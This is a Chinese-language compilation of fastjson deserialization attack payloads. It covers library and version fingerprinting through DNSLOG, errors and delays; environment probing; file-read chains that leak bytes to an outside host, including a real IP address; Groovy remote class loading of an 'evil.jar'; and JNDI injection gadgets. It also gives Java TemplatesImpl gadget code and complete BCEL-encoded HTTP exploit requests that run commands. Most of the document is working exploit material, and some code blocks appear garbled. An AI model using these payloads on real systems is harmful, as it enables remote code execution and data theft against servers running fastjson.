说明
本项目涉及的一些姿势和payload是从之前的随手记的笔记直接粘进来的,很多找不到出处了所以来源未贴出来,望师傅们见谅。
高版本的很多细节还有待更新。
浅蓝Kcon议题内容由@su18师傅整理
各版本复现payload来自@kezibei师傅,我原项目基础上加了maven依赖,做了一点代码修改。
判断是否用了fastjson 鉴别fastjson DNSLOG
1 { "@type" : "java.net.InetSocketAddress" { "address" : , "val" : "dnslog.com" } }
1 { { "@type" : "java.net.URL" , "val" : "http://dnslog.com" } : "a" }
根据解析变化
1 { "a" : new a(1 ), "b" : x'11 ',
根据响应状态
鉴别org.json 特殊字符
鉴别gson 浮点类型精度丢失
1 { a: 1.111111111111111111111111111 }
注释符
鉴别jackson 浮点类型精度丢失
1 { a: 1.111111111111111111111111111 }
注释符
不支持单引号作为界定符
多余的类成员
如果目标回显详细报错信息,稍微破坏一下json结构,比如多一个{,比如简简单单把{}变成a。就可以看出来到底是不是jackson。
1 { "pageNumber" : 1 , "pageSize" : 1 }
加上一个不相关的键值
1 { "pageNumber" : 1 , "pageSize" : 1 , "test" : 1 }
jackson就会报错,fastjson则不会,而是和之前一模一样。
版本探测 无报错信息探测 https://mp.weixin.qq.com/s/jbkN86qq9JxkGNOhwv9nxA
1 { "zero" : { "@type" : "java.lang.Exception" , "@type" : "org.XxException" } }
【不报错】1.2.24-1.2.68
1 { "zero" : { "@type" : "java.lang.AutoCloseable" , "@type" : "java.io.ByteArrayOutputStream" } }
【不报错】1.2.24-1.2.47
1 2 3 4 5 6 7 8 9 { "a" : { "@type" : "java.lang.Class" , "val" : "com.sun.rowset.JdbcRowSetImpl" } , "b" : { "@type" : "com.sun.rowset.JdbcRowSetImpl" } }
【不报错】1.2.24
1 { "zero" : { "@type" : "com.sun.rowset.JdbcRowSetImpl" } }
延迟探测 原理同ssrf漏洞。请求本机已开放端口不延时,请求不开放的端口则延时。
1 { "@type" : "com.sun.rowset.JdbcRowSetImpl" , "dataSourceName" : "rmi://127.0.0.1:1099/badClassName" , "autoCommit" : true }
通用payload,可用于parseObject的场景
1 { "@type" : "com.alibaba.fastjson.JSONObject" , { "@type" : "com.sun.rowset.JdbcRowSetImpl" , "dataSourceName" : "rmi://127.0.0.1:8088/badClassName" , "autoCommit" : true } } "" }
fastjson 1.2.9-1.2.47
1 2 3 4 5 6 7 8 9 10 11 { "a" : { "@type" : "java.lang.Class" , "val" : "com.sun.rowset.JdbcRowSetImpl" } , "b" : { "@type" : "com.sun.rowset.JdbcRowSetImpl" , "dataSourceName" : "ldap://localhost:808/badNameClass" , "autoCommit" : true } }
通用payload,可用于parseObject的场景
1 2 3 4 5 6 7 8 9 10 11 { "@type" : "com.alibaba.fastjson.JSONObject" , { "a" : { "@type" : "java.lang.Class" , "val" : "com.sun.rowset.JdbcRowSetImpl" } , "b" : { "@type" : "com.sun.rowset.JdbcRowSetImpl" , "dataSourceName" : "ldap://localhost:8088/badNameClass" , "autoCommit" : true } } } "" }
Fastjson 1.2.36 - 1.2.62
1 2 3 4 5 6 { "regex" : { "$ref" : "$[blue rlike '^[a-zA-Z]+(([a-zA-Z ])?[a-zA-Z]*)*$']" } , "blue" : "aaaaaaaaaaaa!" }
参考https://mp.weixin.qq.com/s/5mO1L5o8j_m6RYM6nO-pAA
异常回显 异常回显 fastjson 精确版本号
1 2 { "@type" : "java.lang.AutoCloseable"
dns探测 主要是利用各个类被加入黑名单的方式进行判断,但此方法准确性不高。
fastjson <1.2.43
1 2 { "@type" : "java.net.URL" , "val" : "http://dnslog" } { { "@type" : "java.net.URL" , "val" : "http://dnslog" } : "x" }
fastjson <1.2.48
1 { "@type" : "java.net.InetAddress" , "val" : "dnslog" }
fastjson <1.2.68
1 2 3 4 5 6 7 8 { "@type" : "java.net.Inet4Address" , "val" : "dnslog" } { "@type" : "java.net.Inet6Address" , "val" : "dnslog" } { { "@type" : "java.net.URL" , "val" : "dnslog" } : "aaa" } { "@type" : "com.alibaba.fastjson.JSONObject" , { "@type" : "java.net.URL" , "val" : "http://dnslog" } } "" } [ { "@type" : "java.net.URL" , "val" : "http://dnslog" } ] [ { "@type" : "java.net.URL" , "val" : "http://dnslog" } { "@type" : "java.net.InetSocketAddress" { "address" : , "val" : "dnslog" } } { { "@type" : "java.net.URL" , "val" : "http://dnslog" } : 0
精确探索autoType是否开启,开启后能打更多payloadhttps://github.com/pen4uin/awesome-java-security/tree/main/alibaba fastjson
1 [ { "@type" : "java.net.CookiePolicy" } , { "@type" : "java.net.Inet4Address" , "val" : "ydk3cz.dnslog.cn" } ]
关键rce版本探测 1.2.24 版本,用上面的延时探测即可
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 [ { "@type" : "java.lang.Class" , "val" : "java.io.ByteArrayOutputStream" } , { "@type" : "java.io.ByteArrayOutputStream" } , { "@type" : "java.net.InetSocketAddress" { "address" : , "val" : "dnslog" } } ]
1.2.68版本
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 [ { "@type" : "java.lang.AutoCloseable" , "@type" : "java.io.ByteArrayOutputStream" } , { "@type" : "java.io.ByteArrayOutputStream" } , { "@type" : "java.net.InetSocketAddress" { "address" : , "val" : "dnslog" } } ]
1.2.80 版本探测 如果收到了两个 dns 请求,则证明使用了 1.2.83 版本 如果收到了一个 dns 请求,则证明使用了 1.2.80 版本
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 [ { "@type" : "java.lang.Exception" , "@type" : "com.alibaba.fastjson.JSONException" , "x" : { "@type" : "java.net.InetSocketAddress" { "address" : , "val" : "first.dnslog.cn" } } } , { "@type" : "java.lang.Exception" , "@type" : "com.alibaba.fastjson.JSONException" , "message" : { "@type" : "java.net.InetSocketAddress" { "address" : , "val" : "second.dnslog.cn" } } } ]
探测环境
org.springframework.web.bind.annotation.RequestMapping
org.apache.catalina.startup.Tomcat
groovy.lang.GroovyShell
com.mysql.jdbc.Driver
java.net.http.HttpClient
如果系统存在这个类,会返回一个类实例,如果不存在会返回 null
1 2 3 4 5 6 7 8 9 10 11 12 { "z" : { "@type" : "java.lang.Class" , "val" : "org.springframework.web.bind.annotation.RequestMapping" } } { "z" : { "@type" : "java.lang.Class" , "val" : "java.net.http.HttpClient" } }
通过使用 Character 将报错回显在 message 中
1 2 3 4 5 6 { "x" : { "@type" : "java.lang.Character" { "@type" : "java.lang.Class" , "val" : "com.mysql.jdbc.Driver" } }
通过使用 DNSLOG 来探测依赖库
1 2 3 4 5 6 7 8 9 10 { "@type" : "java.net.Inet4Address" , "val" : { "@type" : "java.lang.String" { "@type" : "java.util.Locale" , "val" : { "@type" : "com.alibaba.fastjson.JSONObject" , { "@type" : "java.lang.String" "@type" : "java.util.Locale" , "language" : { "@type" : "java.lang.String" { 1 : { "@type" : "java.lang.Class" , "val" : "groovy.lang.GroovyShell" } } , "country" : "gv.su18.dnslog.pw" } } }
文件写,结合 commons-io 代码(stream 里面写 68 的 payload)
1 2 3 { "x" : [ { "@type" : "java.lang.Exception" , "@type" : "ognl.OgnlException" , } , { "@type" : "java.lang.Class" , "val" : { "@type" : "com.alibaba.fastjson.JSONObject" , { "@type" : "java.lang.String" "@type" : "ognl.OgnlException" , "_evaluation" : "" } } , { "@type" : "ognl.Evaluation" , "node" : { "@type" : "ognl.ASTMethod" , "p" : { "@type" : "ognl.OgnlParser" , "stream" : } } } ] }
aspectj + ognl 任意文件读取 + DNSLOG 回显
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 [ { "@type" : "java.lang.Exception" , "@type" : "org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException" } , { "@type" : "java.lang.Class" , "val" : { "@type" : "java.lang.String" { "@type" : "java.util.Locale" , "val" : { "@type" : "com.alibaba.fastjson.JSONObject" , { "@type" : "java.lang.String" "@type" : "org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException" , "newAnnotationProcessorUnits" : [ { } ] } } } , { "x" : { "@type" : "org.aspectj.org.eclipse.jdt.internal.compiler.env.ICompilationUnit" , "@type" : "org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit" , "fileName" : "aaa" } } ]
aspectj + ognl 文件读取加 DNSLOG 回显
1 2 3 { "a" : { "@type" : "org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit" , "fileName" : "/Users/su18/Downloads/1.txt" } , "b" : { "@type" : "java.net.Inet4Address" , "val" : { "@type" : "java.lang.String" { "@type" : "java.util.Locale" , "val" : { "@type" : "com.alibaba.fastjson.JSONObject" , { "@type" : "java.lang.String" "@type" : "java.util.Locale" , "language" : { "@type" : "java.lang.String" { "$ref" : "$" } , "country" : "aw.su18.dnslog.pw" } } } } }
commons-io + ognl + URLReader 单字节文件读取(回显情况观察数值)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 { "su14" : { "@type" : "java.lang.Exception" , "@type" : "ognl.OgnlException" } , "su15" : { "@type" : "java.lang.Class" , "val" : { "@type" : "com.alibaba.fastjson.JSONObject" , { "@type" : "java.lang.String" "@type" : "ognl.OgnlException" , "_evaluation" : "" } } , "su16" : { "@type" : "ognl.Evaluation" , "node" : { "@type" : "ognl.ASTMethod" , "p" : { "@type" : "ognl.OgnlParser" , "stream" : { "@type" : "org.apache.commons.io.input.BOMInputStream" , "delegate" : { "@type" : "org.apache.commons.io.input.ReaderInputStream" , "reader" : { "@type" : "jdk.nashorn.api.scripting.URLReader" , "url" : "file:///Users/su18/Downloads/1.txt" } , "charsetName" : "UTF-8" , "bufferSize" : 1024 } , "boms" : [ { "@type" : "org.apache.commons.io.ByteOrderMark" , "charsetName" : "UTF-8" , "bytes" : [ 98 ] } ] } } } } , "su17" : { "$ref" : "$.su16.node.p.stream" } , "su18" : { "$ref" : "$.su17.bOM.bytes" } }
commons-io + ognl + URLReader 单字节文件读取(报错布尔)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 [ { "su15" : { "@type" : "java.lang.Exception" , "@type" : "ognl.OgnlException" , } } , { "su16" : { "@type" : "java.lang.Class" , "val" : { "@type" : "com.alibaba.fastjson.JSONObject" , { "@type" : "java.lang.String" "@type" : "ognl.OgnlException" , "_evaluation" : "" } } } , { "su17" : { "@type" : "ognl.Evaluation" , "node" : { "@type" : "ognl.ASTMethod" , "p" : { "@type" : "ognl.OgnlParser" , "stream" : { "@type" : "org.apache.commons.io.input.BOMInputStream" , "delegate" : { "@type" : "org.apache.commons.io.input.ReaderInputStream" , "reader" : { "@type" : "jdk.nashorn.api.scripting.URLReader" , "url" : "file:///Users/su18/Downloads/1.txt" } , "charsetName" : "UTF-8" , "bufferSize" : 1024 } , "boms" : [ { "@type" : "org.apache.commons.io.ByteOrderMark" , "charsetName" : "UTF-8" , "bytes" : [ 98 ] } ] } } } } } , { "su18" : { "$ref" : "$[2].su17.node.p.stream" } } , { "su19" : { "$ref" : "$[3].su18.bOM.bytes" } } , { "su20" : { "@type" : "ognl.Evaluation" , "node" : { "@type" : "ognl.ASTMethod" , "p" : { "@type" : "ognl.OgnlParser" , "stream" : { "@type" : "org.apache.commons.io.input.BOMInputStream" , "delegate" : { "@type" : "org.apache.commons.io.input.ReaderInputStream" , "reader" : { "@type" : "org.apache.commons.io.input.CharSequenceReader" , "charSequence" : { "@type" : "java.lang.String" { "$ref" : "$[4].su19" } , "start" : 0 , "end" : 0 } , "charsetName" : "UTF-8" , "bufferSize" : 1024 } , "boms" : [ { "@type" : "org.apache.commons.io.ByteOrderMark" , "charsetName" : "UTF-8" , "bytes" : [ 1 ] } ] } } } } } , { "su21" : { "$ref" : "$[5].su20.node.p.stream" } } ]
commons-io + ognl + URLReader 单字节文件读取 HTTPLog 布尔回显(错误的时候有 log,正确时 无 log)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 [ { "su15" : { "@type" : "java.lang.Exception" , "@type" : "ognl.OgnlException" , } } , { "su16" : { "@type" : "java.lang.Class" , "val" : { "@type" : "com.alibaba.fastjson.JSONObject" , { "@type" : "java.lang.String" "@type" : "ognl.OgnlException" , "_evaluation" : "" } } } , { "su17" : { "@type" : "ognl.Evaluation" , "node" : { "@type" : "ognl.ASTMethod" , "p" : { "@type" : "ognl.OgnlParser" , "stream" : { "@type" : "org.apache.commons.io.input.BOMInputStream" , "delegate" : { "@type" : "org.apache.commons.io.input.ReaderInputStream" , "reader" : { "@type" : "jdk.nashorn.api.scripting.URLReader" , "url" : "file:///Users/su18/Downloads/1.txt" } , "charsetName" : "UTF-8" , "bufferSize" : 1024 } , "boms" : [ { "@type" : "org.apache.commons.io.ByteOrderMark" , "charsetName" : "UTF-8" , "bytes" : [ 98 ] } ] } } } } } , { "su18" : { "$ref" : "$[2].su17.node.p.stream" } } , { "su19" : { "$ref" : "$[3].su18.bOM.bytes" } } , { "su22" : { "@type" : "ognl.Evaluation" , "node" : { "@type" : "ognl.ASTMethod" , "p" : { "@type" : "ognl.OgnlParser" , "stream" : { "@type" : "org.apache.commons.io.input.BOMInputStream" , "delegate" : { "@type" : "org.apache.commons.io.input.ReaderInputStream" , "reader" : { "@type" : "jdk.nashorn.api.scripting.URLReader" , "url" : { "@type" : "java.lang.String" { "@type" : "java.net.URL" , "val" : { "@type" : "java.lang.String" { "@type" : "java.util.Locale" , "val" : { "@type" : "com.alibaba.fastjson.JSONObject" , { "@type" : "java.lang.String" "@type" : "java.util.Locale" , "language" : "http://120.48.129.28:8080/test?" , "country" : { "@type" : "java.lang.String" { "$ref" : "98" } } } } } , "charsetName" : "UTF-8" , "bufferSize" : 1024 } , "boms" : [ { "@type" : "org.apache.commons.io.ByteOrderMark" , "charsetName" : "UTF-8" , "bytes" : [ 1 ] } ] } } } } } , { "su23" : { "$ref" : "$[5].su22.node.p.stream" } } , { "su20" : { "@type" : "ognl.Evaluation" , "node" : { "@type" : "ognl.ASTMethod" , "p" : { "@type" : "ognl.OgnlParser" , "stream" : { "@type" : "org.apache.commons.io.input.BOMInputStream" , "delegate" : { "@type" : "org.apache.commons.io.input.ReaderInputStream" , "reader" : { "@type" : "org.apache.commons.io.input.CharSequenceReader" , "charSequence" : { "@type" : "java.lang.String" { "$ref" : "$[4].su19" } , "start" : 0 , "end" : 0 } , "charsetName" : "UTF-8" , "bufferSize" : 1024 } , "boms" : [ { "@type" : "org.apache.commons.io.ByteOrderMark" , "charsetName" : "UTF-8" , "bytes" : [ 1 ] } ] } } } } } , { "su21" : { "$ref" : "$[7].su20.node.p.stream" } } ]
aspectj 读文件 + Character 报错回显
1 2 3 4 { "@type" : "java.lang.Character" { "c" : { "@type" : "org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit" , "fileName" : "/Users/su18/Downloads/1.txt" } }
commons-io + ognl + URLReader + aspectj HTTP Log 回显
1 { "su14" : { "@type" : "java.lang.Exception" , "@type" : "ognl.OgnlException" } , "su15" : { "@type" : "java.lang.Class" , "val" : { "@type" : "com.alibaba.fastjson.JSONObject" , { "@type" : "java.lang.String" "@type" : "ognl.OgnlException" , "_evaluation" : "" } } , "su16" : { "@type" : "ognl.Evaluation" , "node" : { "@type" : "ognl.ASTMethod" , "p" : { "@type" : "ognl.OgnlParser" , "stream" : { "@type" : "org.apache.commons.io.input.BOMInputStream" , "delegate" : { "@type" : "org.apache.commons.io.input.ReaderInputStream" , "reader" : { "@type" : "jdk.nashorn.api.scripting.URLReader" , "url" : { "@type" : "java.lang.String" { "@type" : "java.net.URL" , "val" : { "@type" : "java.lang.String" { "@type" : "java.util.Locale" , "val" : { "@type" : "com.alibaba.fastjson.JSONObject" , { "@type" : "java.lang.String" "@type" : "java.util.Locale" , "language" : "http://x.x.x.x:8080/test?" , "country" : { "@type" : "java.lang.String" [ { "@type" : "org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit" , "fileName" : "/Users/su18/Downloads/1.txt" } ] } } } } , "charsetName" : "UTF-8" , "bufferSize" : 1024 } , "boms" : [ { "@type" : "org.apache.commons.io.ByteOrderMark" , "charsetName" : "UTF-8" , "bytes" : [ 1 ] } ] } } } } , "su17" : { "$ref" : "$.su16.node.p.stream" } }
groovy 远程类加载
1 2 3 4 5 { "@type" : "java.lang.Exception" , "@type" : "org.codehaus.groovy.control.CompilationFailedException" , "unit" : { }
远程类加载
1 2 3 4 5 6 7 8 9 10 { "@type" : "org.codehaus.groovy.control.ProcessingUnit" , "@type" : "org.codehaus.groovy.tools.javac.JavaStubCompilationUnit" , "config" : { "@type" : "org.codehaus.groovy.control.CompilerConfiguration" , "classpathList" : [ "http://.x.x.x:8080/evil.jar" ] } , "gcl" : null , "destDir" : "/tmp" }
利用链挖掘 https://xz.aliyun.com/t/7482 https://xz.aliyun.com/t/7789#toc-4
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 : : PathGraph{ { "javax.naming" , "Context" ) and"lookup" )} } : : Configuration { { this = "MyTaintTrackingConfiguration" } : : Node source) { } : : Node sink) { 0 )} } , DataFlow2: : PathNode source, DataFlow2: : PathNode sink, sink), source, sink, sink.getNode()
FastJson与原生反序列化 https://y4tacker.github.io/2023/03/20/year/2023/3/FastJson与原生反序列化/
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 import com.alibaba.fastjson.JSONArray;{ , String name, Object value) throws Exception{ true , value);} [ ] args) throws Exception{ "a" );[ ] { } , clazz);"Runtime.getRuntime().exec(\"open -na Calculator\");" );[ ] [ ] bytes = new byte[ ] [ ] { clazz.toBytecode()} ;, "_bytecodes" , bytes);, "_name" , "y4tacker" );, "_tfactory" , null null "val" );true , jsonArray);} }
fastjson2
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 import javax.management.BadAttributeValueExpException;{ , String name, Object value) throws Exception{ true , value);} [ ] args) throws Exception{ "a" );[ ] { } , clazz);"Runtime.getRuntime().exec(\"open -na Calculator\");" );[ ] [ ] bytes = new byte[ ] [ ] { clazz.toBytecode()} ;, "_bytecodes" , bytes);, "_name" , "y4tacker" );, "_tfactory" , null null "val" );true , jsonArray);} }
各版本利用 除了考虑Fastjson版本,还得考虑JDK版本,中间件版本,第三方依赖版本。
JDK版本对于JDNI注入的限制,基于RMI利用的JDK版本<=6u141、7u131、8u121,基于LDAP利用的JDK版本<=6u211、7u201、8u191。(更高版本也有绕过)https://github.com/veracode-research/rogue-jndi
jndi
JdbcRowSetImpl
C3p0#JndiRefForwardingDataSource
JndiDataSourceFactory
bcel
tomcat#dbcp
ibatis
TemplatesImpl
Fastjson 1.2.22-1.2.24 JdbcRowSetImpl
1 { "@type" : "com.sun.rowset.JdbcRowSetImpl" , "dataSourceName" : "rmi://127.0.0.1:1099/badClassName" , "autoCommit" : true }
c3p0#JndiRefForwardingDataSource
JdbcRowSetImpl无法成功可以一试
1 { "@type" : "com.mchange.v2.c3p0.JndiRefForwardingDataSource" , "jndiName" : "rmi://127.0.0.1:1099/badClassName" , "loginTimeout" : 0 }
shiro#JndiObjectFactory
1 { "@type" : "org.apache.shiro.jndi.JndiObjectFactory" , "resourceName" : "rmi://127.0.0.1:9050/exploit" }
shiro#JndiRealmFactory
1 { "@type" : "org.apache.shiro.realm.jndi.JndiRealmFactory" , "jndiNames" : "rmi://127.0.0.1:9050/exploit" }
bcel
可用于解决不出网利用。
Poc
1 2 3 4 5 6 7 8 9 10 11 { { "x" : { "@type" : "org.apache.tomcat.dbcp.dbcp2.BasicDataSource" , "driverClassLoader" : { "@type" : "com.sun.org.apache.bcel.internal.util.ClassLoader" } , "driverClassName" : "$$BCEL$$$l$8b$I$A$..." } } : "x" }
exp
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 POST /json HTTP/1.1 : 127.0 .0 .1 : 9092 : application/json: whoami: 3327 { { "@type" : "com.alibaba.fastjson.JSONObject" , "x" : { "@type" : "org.apache.tomcat.dbcp.dbcp2.BasicDataSource" , "driverClassLoader" : { "@type" : "com.sun.org.apache.bcel.internal.util.ClassLoader" } , "driverClassName" : "$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dV$cb$5b$TW$U$ff$5dH27$c3$m$g$40$Z$d1$wX5$a0$q$7d$d8V$81Zi$c4b$F$b4F$a5$f8j$t$c3$85$MLf$e2$cc$E$b1$ef$f7$c3$be$ec$a6$df$d7u$X$ae$ddD$bf$f6$d3$af$eb$$$ba$ea$b6$ab$ae$ba$ea$7fP$7bnf$C$89$d0$afeq$ee$bd$e7$fe$ce$ebw$ce$9d$f0$cb$df$3f$3e$Ap$I$df$aaHbX$c5$IF$a5x$9e$e3$a8$8a$Xp$8ccL$c1$8b$w$U$e4$U$iW1$8e$T$i$_qLp$9c$e4x$99$e3$94$bc$9b$e4$98$e2$98VpZ$o$cep$bc$c2qVE$k$e7Tt$e2$3c$c7$F$b9$cep$bc$ca1$cbqQ$G$bb$c4qY$c1$V$VW$f1$9a$U$af$ab0PP$b1$h$s$c7$9c$5c$85$U$f3$i$L$iE$F$96$82E$86$c4$a8$e5X$c1Q$86$d6$f4$c0$F$86X$ce$9d$T$M$j$93$96$p$a6$x$a5$82$f0$ce$Z$F$9b4$7c$d4$b4$pd$7b$3e0$cc$a5$v$a3$5c$bb$a2j$U$yQ$z$94$ac$C$9b$fc2$a8y$b7$e2$99$e2$84$r$z$3b$f2e$cfr$W$c6$cd$a2$9bY4$96$N$N$H1$a4$a0$a4$c1$81$ab$a1$8ck$M$a3$ae$b7$90$f1k$b8y$cf$u$89$eb$ae$b7$94$b9$$$K$Z$d3u$C$b1$Sd$3cq$ad$o$fc$ms6$5cs$a1z$c2$b5$e7$84$a7$c0$d3$e0$p$60$e8Z$QA$84$Y$L$C$cf$wT$C$e1S$G2l$d66$9c$85l$ce6$7c_C$F$cb$M$9b$d7$d4$a7$L$8b$c2$M$a8$O$N$d7$b1$c2p$ec$ff$e6$93$X$de$b2$bda$d0$b6Z$$$7e$d9u$7c$oA$5d$cb$8ca$a7$M$bc$92$f1C$db5$lup$92$c03$9e$V$I$aa$eb$86$ccto$b3A1$I$ca$99$J$S$cd$d1C$c3$Ja$Q$tM$d5$e5$DY$88$867$f0$s$f5$d9$y$cd1$u$ae$9fq$a80$Foix$h$efhx$X$ef$d1$e5$cc$c9i$N$ef$e3$D$86$96$acI$b0l$c1r$b2$7e$91$8eC$a6$86$P$f1$R$e9$q$z$81$ed0l$a9$85$a8$E$96$9d$cd$9b$86$e3$c8V$7c$ac$e1$T$7c$aa$e13$7c$ae$e0$a6$86$_$f0$a5l$f8W$e4$e1$f2$98$86$af$f1$8d$86$5b2T$7c$de$aeH$c7q$d3ve$d1$9dk$f9$8e$af$98$a2$iX$$$85$e85$ddRv$de$f0$83E$dfu$b2$cb$V$8a$b4$3aM$M$3dk6$9e$98$b7$a9$85$d9$v$R$U$5d$w$b0$f3$d2$e4$a3$E$8c4$91r$ae$e8$RS4$cdf$c5$f3$84$T$d4$cf$5d$e9$81$c9GQd$d9M$d4FSW$9b$a1I7$a4Yo$827$5cI$9b$N$_$a8M6mj$gjmz$7d$9e$eb$3c$8e$84$ad$ad$d7vl$D$9bK$ebl$g$bd4$b3C$ee$S$96$b3$ec$$$R$edG$g$7d$85$cf$a0$c9W$a4$gX$af$a2$feSN$c7$85i$h$9e$98$ab$e7$d6$ee$8b$60$cc4$85$ef$5b$b5$efF$y$7dQ$7eW$g$a7$f1$86$l$88R$f8$40$cexnYx$c1$N$86$7d$ff$c1$c3j$L$db$C$f7$7c$99$8cr$86$9c$9a$e6n$ad$82$b8$7c$a7$86$e5$Q$c1$bd$8d$8esE$c3$cb$cb$d7$e2$98bd$e0$o$Be$5b$c3Nt$ae$ef$e4H$7d$c6k$aa$b3$V$t$b0J$f5$c7$5c$3ft7$99Ej2$8c$89$VA$_$u$9d$de$60$Q$h$z$88$C$c9Vs$a8H$c9$b0$89B$9dt$ca$95$80$y$85A$acm$ab$87$b3$dcl$c3$F$99$f7$a47$bc$90$eck$V_$i$X$b6U$92$df$U$86$fd$ff$ceu$e3c$96E84$ef$e8$c3$B$fa$7d$91$7f$z$60$f2$ebM2C$a7$9d$b42Z$e3$83w$c1$ee$d0$86$nK2QS$s$c0$f1D$j$da$d2O$O$da$Ip$f5$kZ$aahM$c5$aa$88$9f$gL$rZ$efC$a9$82O$k$60$b4KV$a1NE$80$b6$Q$a0$d5$B$83$a9$f6h$3b$7d$e0$60$84$j$8e$N$adn$e3$91$dd$s$b2Ku$84$d0$cd$c3$89H$bbEjS1$d2$ce$b6$a6$3a$f3$f2J$d1$VJ$a2KO$84R$8f$d5$3dq$5d$d1$e3$EM$S$b4$9b$a0$ea$cf$e8$iN$s$ee$93TS$5b$efa$5b$V$3d$v$bd$8a$ed$df$p$a5$ab$S$a3$ab$b1To$fe6$3a$e4qG$ed$b8$93d$5cO$e6u$5e$c5c$a9$5d$8d$91u$k$3a$ff$J$bbg$ef$a1OW$ab$e8$afb$cf$5d$3c$9e$da$5b$c5$be$w$f6$cb$a03$a1e$3a$aaD$e7Qz$91$7e$60$9d$fe6b$a7$eeH$e6$d9$y$bb$8cAj$95$ec$85$83$5e$92IhP$b1$8d$3a$d0G$bb$n$b4$e306$n$87$OLc3f$b1$F$$R$b8I$ffR$dcB$X$beC7$7e$c0VP$a9x$80$k$fc$K$j$bfa$3b$7e$c7$O$fcAM$ff$T$bb$f0$Xv$b3$B$f4$b11$f4$b3Y$ec$a5$88$7b$d8$V$ec$c7$93$U$edY$c4$k$S$b8M$c1S$K$9eVp$a8$$$c3M$b8$7fF$n$i$da$k$c2$93s$a3$e099$3d$87k$pv$e4$l$3eQL$40E$J$A$A" } } : "x" }
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 1.1 : 127.0 .0 .1 : 9092 : application/json: ver && echo fastjson: 3327 { { "@type" : "com.alibaba.fastjson.JSONObject" , "x" : { "@type" : "org.apache.tomcat.dbcp.dbcp2.BasicDataSource" , "driverClassLoader" : { "@type" : "com.sun.org.apache.bcel.internal.util.ClassLoader" } , "driverClassName" : "$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$95W$Jx$Ug$Z$7e$t$bb$9b$99L$s$90$y$y$n$Jm9K$Sr$ARZ$S$K$84$40$m$92$84$98$NP$O$95$c9dH$W6$3bav$96$40$ab$b6JZ$5b$LZ$Lj9$d4$Kj$3c$f0$m$d1$r$82E$bc$82$d6$fb$3e$aax$l$f5$be$8b$8fJ$7d$ff$99$Nn$c8$96$3c$3e$cf$ce$7f$7e$ffw$be$df$f7$ff$fb$f4$b5$f3$X$B$y$c1U$V$c5x$m$H$ab$f1j$d1$bcF$c6A$V$7eo$a5_4$P$wxH$c5k$f1$b0$98$3c$a2$e0u$a2$7fT$c6$n$Vy8$ac$e2$f5x$83$ca$95$c7$c4$a97$8a$e6q1$3d$o$d8$kUQ$887$vx$b3$8c$b7$c8xB$cc$8e$c98$ae$a0I$c5$J$9c$U$8c$de$aa$a0C$c6$dbd$bc$5d$c5L$i$96$f1$a4$8a$d9$a2$7f$87$8a$b98$ac$e0$94$8a$d3x$a7$8a$e9x$97$82w$8b$7e$40$c1$7b$U$bcW$c1$fbd$bc_$c6$Z$V$l$c0$HE$f3$n$V$l$c6Y$V$d5$YT0$q$fa$8f$88$e6$a3$w$aa$90$U$cd9$d1$M$L5$3e$a6$e2$3c$$$88$e6$e3b$fa$94P$f9$a2$8cO$88$c9$ra$d3$te$7cJ$82$d4$zaJ$d3n$7d$9f$5e$9dp$o$d1$ea$f5z$bc$3bl$3a$b5$Sr$c2$91$ae$98$ee$qlS$c2$fc$f1$U$cb$bd$a5$a8$k$eb$aa$de$d8$b1$db4$9c$da$V$3c$95eD$r$U$a6$ed$d5G$f5x$bc$c9$d2$3bM$9b$db$be$ee$b8$z$a1$e0$c6$7do$a7$97$ad$d1$d3$v$n$98$b6$lv$ecH$ac$8b$E$92$3dv$p$r$94$h$3c$97$bd$3c$S$8b8$x$c8$a0$b4l$b3$E$7f$bd$d5I$b5$t7EbfK$a2$a7$c3$b4$db$f5$8e$a8$v$YX$86$k$dd$ac$db$R1O$zJ$fcf$df$a8R$8b$e54X$89X$e7$da$fd$86$d9$ebD$ac$Y$r$f9$9d$eeH$5c$c2$9c$a6x$a2$a7$c7$b4$e3$a6Qm$g$ddVu$bd$Vsl$x$g5$ed$ea$baht$z$97H$9c$XvtcO$b3$de$ebJ$a1$b3$J$u$ca$8aH$I$95$8e7$a3l$hu$b7$3avK$c8o6$9dn$ab$b3U$b7$f5$k$d3$a1$U$J$d32$ih$Uv$e6v$99N$9b$Z$ef$b5bq$daP$9cFe$9b$bb$a2$q$ab$f6$98Q$9dP$daf$baM$e9$867$d2$84$$$3dZg$Yf$3c$9eNT$99$81scl$l$7d$v$I$dau$9bz$a4$d3$cfJ$a3o$b1$c2$J$a3$db$d3$p$9d$s$d7$e8$d6$e9B$a7$85f$S7$bd$7d$d7u$8cX$d5$ad$M$ba$b3$c5$8e8$$j$qKB$a0$93$t$JV$a9$d1K$s$e6$RS$889$c7$a5$G$7e$7b$e9$f1N$d3$88$ea$b6$d9$d9$Q1$a3$84QQ$G$ad$dd$z$b2$M$c4$j$ddvx$$$e6f$ee$a7e$7c$86y$xAYnDSPR$c3V$c26$cc$86$88$c0$88$96$Kl$95$60$a9$e1$rh$d3$d0$82$8d$gZ$b1$91$80$k$97$k$g$ea$b1F$c3$3a$ac$970O$ec$ee$af$8a$9b$f6$be$a8$e